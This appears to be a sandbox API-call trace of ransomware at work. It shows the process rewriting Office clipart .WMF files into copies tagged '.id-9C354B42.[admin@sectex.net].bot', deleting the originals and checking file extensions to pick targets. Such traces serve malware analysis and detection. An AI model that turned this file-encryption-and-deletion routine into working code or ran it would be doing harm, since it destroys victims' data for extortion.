	[0145.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.325] GetLastError () returned 0x0
	[0145.325] ReadFile (in: hFile=0x38c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x384, lpOverlapped=0x0) returned 1
	[0145.326] WriteFile (in: hFile=0x3a0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x390, lpOverlapped=0x0) returned 1
	[0145.327] ReadFile (in: hFile=0x38c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.327] WriteFile (in: hFile=0x3a0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.327] SetEndOfFile (hFile=0x3a0) returned 1
	[0145.328] CloseHandle (hObject=0x3a0) returned 1
	[0145.328] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.328] SetEndOfFile (hFile=0x38c) returned 1
	[0145.330] CloseHandle (hObject=0x38c) returned 1
	[0145.330] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.330] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf")) returned 1
	[0145.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63
	[0145.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63
	[0145.330] lstrlenW (lpString=".doc") returned 4
	[0145.331] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.331] lstrlenW (lpString=".docx") returned 5
	[0145.331] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.331] lstrlenW (lpString=".pdf") returned 4
	[0145.331] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.331] lstrlenW (lpString=".xls") returned 4
	[0145.331] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.331] lstrlenW (lpString=".xlsx") returned 5
	[0145.331] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.331] lstrlenW (lpString=".ppt") returned 4
	[0145.331] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63
	[0145.331] lstrlenW (lpString=".zip") returned 4
	[0145.331] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.331] lstrlenW (lpString=".rar") returned 4
	[0145.331] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.331] lstrlenW (lpString=".bz2") returned 4
	[0145.331] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.331] lstrlenW (lpString=".7z") returned 3
	[0145.331] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63
	[0145.331] lstrlenW (lpString=".dbf") returned 4
	[0145.331] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63
	[0145.331] lstrlenW (lpString=".1cd") returned 4
	[0145.331] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63
	[0145.331] lstrlenW (lpString=".jpg") returned 4
	[0145.331] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63
	[0145.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63
	[0145.331] lstrlenW (lpString=".doc") returned 4
	[0145.331] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.331] lstrlenW (lpString=".docx") returned 5
	[0145.332] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.332] lstrlenW (lpString=".pdf") returned 4
	[0145.332] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.332] lstrlenW (lpString=".xls") returned 4
	[0145.332] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.332] lstrlenW (lpString=".xlsx") returned 5
	[0145.332] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.332] lstrlenW (lpString=".ppt") returned 4
	[0145.332] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63
	[0145.332] lstrlenW (lpString=".zip") returned 4
	[0145.332] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.332] lstrlenW (lpString=".rar") returned 4
	[0145.332] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.332] lstrlenW (lpString=".bz2") returned 4
	[0145.332] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.332] lstrlenW (lpString=".7z") returned 3
	[0145.332] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63
	[0145.332] lstrlenW (lpString=".dbf") returned 4
	[0145.332] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63
	[0145.332] lstrlenW (lpString=".1cd") returned 4
	[0145.332] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63
	[0145.332] lstrlenW (lpString=".jpg") returned 4
	[0145.332] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.332] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.332] lstrlenW (lpString="ED00010_.WMF") returned 12
	[0145.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.333] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1382) returned 1
	[0145.333] CloseHandle (hObject=0x38c) returned 1
	[0145.333] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf")) returned 0x20
	[0145.333] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.334] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.334] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.335] GetLastError () returned 0x0
	[0145.335] ReadFile (in: hFile=0x38c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x566, lpOverlapped=0x0) returned 1
	[0145.336] WriteFile (in: hFile=0x3a0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x570, lpOverlapped=0x0) returned 1
	[0145.337] ReadFile (in: hFile=0x38c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.338] WriteFile (in: hFile=0x3a0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.338] SetEndOfFile (hFile=0x3a0) returned 1
	[0145.338] CloseHandle (hObject=0x3a0) returned 1
	[0145.338] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.338] SetEndOfFile (hFile=0x38c) returned 1
	[0145.340] CloseHandle (hObject=0x38c) returned 1
	[0145.340] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.340] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf")) returned 1
	[0145.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63
	[0145.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63
	[0145.348] lstrlenW (lpString=".doc") returned 4
	[0145.348] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.348] lstrlenW (lpString=".docx") returned 5
	[0145.348] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.348] lstrlenW (lpString=".pdf") returned 4
	[0145.348] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.348] lstrlenW (lpString=".xls") returned 4
	[0145.349] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.349] lstrlenW (lpString=".xlsx") returned 5
	[0145.349] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.349] lstrlenW (lpString=".ppt") returned 4
	[0145.349] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63
	[0145.349] lstrlenW (lpString=".zip") returned 4
	[0145.349] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.349] lstrlenW (lpString=".rar") returned 4
	[0145.349] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.349] lstrlenW (lpString=".bz2") returned 4
	[0145.349] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.349] lstrlenW (lpString=".7z") returned 3
	[0145.349] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63
	[0145.349] lstrlenW (lpString=".dbf") returned 4
	[0145.349] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63
	[0145.349] lstrlenW (lpString=".1cd") returned 4
	[0145.349] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63
	[0145.349] lstrlenW (lpString=".jpg") returned 4
	[0145.349] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63
	[0145.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63
	[0145.349] lstrlenW (lpString=".doc") returned 4
	[0145.349] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.349] lstrlenW (lpString=".docx") returned 5
	[0145.349] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.349] lstrlenW (lpString=".pdf") returned 4
	[0145.349] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.349] lstrlenW (lpString=".xls") returned 4
	[0145.350] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.350] lstrlenW (lpString=".xlsx") returned 5
	[0145.350] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.350] lstrlenW (lpString=".ppt") returned 4
	[0145.350] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63
	[0145.350] lstrlenW (lpString=".zip") returned 4
	[0145.350] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.350] lstrlenW (lpString=".rar") returned 4
	[0145.350] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.350] lstrlenW (lpString=".bz2") returned 4
	[0145.350] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.350] lstrlenW (lpString=".7z") returned 3
	[0145.350] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63
	[0145.350] lstrlenW (lpString=".dbf") returned 4
	[0145.350] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63
	[0145.350] lstrlenW (lpString=".1cd") returned 4
	[0145.350] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63
	[0145.350] lstrlenW (lpString=".jpg") returned 4
	[0145.350] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.350] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.350] lstrlenW (lpString="ED00019_.WMF") returned 12
	[0145.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.351] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=13042) returned 1
	[0145.351] CloseHandle (hObject=0x38c) returned 1
	[0145.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf")) returned 0x20
	[0145.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.352] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.352] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0145.679] GetLastError () returned 0x0
	[0145.679] ReadFile (in: hFile=0x38c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x32f2, lpOverlapped=0x0) returned 1
	[0145.683] WriteFile (in: hFile=0x3bc, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x3300, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x3300, lpOverlapped=0x0) returned 1
	[0145.684] ReadFile (in: hFile=0x38c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.684] WriteFile (in: hFile=0x3bc, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.684] SetEndOfFile (hFile=0x3bc) returned 1
	[0145.684] CloseHandle (hObject=0x3bc) returned 1
	[0145.684] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.685] SetEndOfFile (hFile=0x38c) returned 1
	[0145.687] CloseHandle (hObject=0x38c) returned 1
	[0145.687] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.687] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf")) returned 1
	[0145.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63
	[0145.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63
	[0145.688] lstrlenW (lpString=".doc") returned 4
	[0145.688] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.688] lstrlenW (lpString=".docx") returned 5
	[0145.688] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.688] lstrlenW (lpString=".pdf") returned 4
	[0145.688] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.688] lstrlenW (lpString=".xls") returned 4
	[0145.688] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.688] lstrlenW (lpString=".xlsx") returned 5
	[0145.688] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.688] lstrlenW (lpString=".ppt") returned 4
	[0145.688] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63
	[0145.688] lstrlenW (lpString=".zip") returned 4
	[0145.688] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.688] lstrlenW (lpString=".rar") returned 4
	[0145.688] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.688] lstrlenW (lpString=".bz2") returned 4
	[0145.688] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.688] lstrlenW (lpString=".7z") returned 3
	[0145.688] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63
	[0145.688] lstrlenW (lpString=".dbf") returned 4
	[0145.688] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63
	[0145.688] lstrlenW (lpString=".1cd") returned 4
	[0145.688] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63
	[0145.688] lstrlenW (lpString=".jpg") returned 4
	[0145.688] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63
	[0145.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63
	[0145.688] lstrlenW (lpString=".doc") returned 4
	[0145.689] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.689] lstrlenW (lpString=".docx") returned 5
	[0145.689] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.689] lstrlenW (lpString=".pdf") returned 4
	[0145.689] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.689] lstrlenW (lpString=".xls") returned 4
	[0145.689] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.689] lstrlenW (lpString=".xlsx") returned 5
	[0145.689] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.689] lstrlenW (lpString=".ppt") returned 4
	[0145.689] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63
	[0145.689] lstrlenW (lpString=".zip") returned 4
	[0145.689] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.689] lstrlenW (lpString=".rar") returned 4
	[0145.689] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.689] lstrlenW (lpString=".bz2") returned 4
	[0145.689] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.689] lstrlenW (lpString=".7z") returned 3
	[0145.689] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63
	[0145.689] lstrlenW (lpString=".dbf") returned 4
	[0145.689] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63
	[0145.689] lstrlenW (lpString=".1cd") returned 4
	[0145.689] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63
	[0145.689] lstrlenW (lpString=".jpg") returned 4
	[0145.689] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.689] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.690] lstrlenW (lpString="FD00076_.WMF") returned 12
	[0145.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00076_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.690] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=11994) returned 1
	[0145.690] CloseHandle (hObject=0x38c) returned 1
	[0145.690] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00076_.wmf")) returned 0x20
	[0145.690] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00076_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.691] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.691] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
